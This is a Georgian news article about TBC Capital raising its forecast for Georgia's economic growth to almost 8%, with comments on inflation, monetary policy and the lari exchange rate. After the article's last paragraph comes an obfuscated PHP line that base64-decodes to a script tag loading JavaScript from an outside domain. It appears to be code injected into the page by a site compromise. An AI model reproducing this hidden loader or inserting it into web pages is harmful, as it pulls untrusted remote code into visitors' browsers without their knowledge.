celsiusi
ავერსი საქკაბელი
თიბისი კაპიტალმა საქართველოს ეკონომიკური ზრდის პროგნოზი 5.5%-დან თითქმის 8%-მდე გაზარდა.
 
ზრდის ფაქტორების მხრივ, ტურიზმის, გზავნილების, დაკრედიტების, პირდაპირი უცხოური ინვესტიციებისა და იმპორტის მოლოდინები გაუმჯობესებულია. ექსპორტის მხრივ, წინა შეფასებასთან შედარებით, მხოლოდ მცირედი გაუმჯობესებაა. ბიუჯეტის დეფიციტი კი უფრო ნაკლებ ნიშნულზეა.
 
თიბისი კაპიტალის შეფასებით, ინფლაციის მიმართულება კვლავ პრობლემურია. საკუთრივ, წლის ბოლოსათვის წინა, 9.5%-იანი პროგნოზი მხოლოდ მცირედით, მაგრამ მაინც გაზრდილია, თუმცა იმ პირობით, რომ წლის განმავლობაში ლარი დამატებით გამყარდება.
 
მონეტარული პოლიტიკის კუთხით, მაღალი ინფლაციის მიუხედავად, შემდგომი გამკაცრება არაა ნავარაუდები. ამის მიზეზი, ფასებზე მიწოდების მხრიდან გამოწვეული ზეწოლაა.
 
„ლარის შემდგომი გაძვირება ხელს უშლის ლარიზაციის პროცესს. დამატებით, გასათვალისწინებელია, რომ ჩვენი აზრით, არ არის აუცილებელი ლარში გამკაცრებამ ეკონომიკის ზრდა შეაფერხოს. კერძოდ, უცხოური ვალუტით გაცემული სესხების ეფექტის გარდა, ლარის გამყარება აუმჯობესებს სამომხმარებლო და ბიზნეს განწყობებს და ამით, სულ მცირე მოკლევადიან პერიოდში, ეკონომიკის ზრდა პირიქით ჩქარდება.
 
თავის მხრივ, სავალუტო შემოდინებები ისედაც ძლიერია და დამატებითი გამკაცრების გარეშეც ლარის გამყარება, ვფიქრობთ, რომ სწორედ საბაზო სცენარია. ლარის საშუალო კურსის კუთხით, ჩვენი აზრით, სადღეისოდ გარკვეული ზედმეტად გამყარების ნიშნები აღარ იკვეთება.
 
ამავდროულად, კვლავ ვინარჩუნებთ შეფასებას, რომ საერთაშორისო ბაზრებზე აშშ დოლარის მნიშვნელოვანი გაუფასურების გარეშე, რაც როგორც ჩანს უფრო სამომავლო პერსპექტივაა, ლარის დოლართან მკვეთრი გამყარების ალბათობა ახლო პერსპექტივაში შედარებით ნაკლებია“, - წერია თიბისი კაპიტალის მაკრო მიმოხილვაში.
660
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");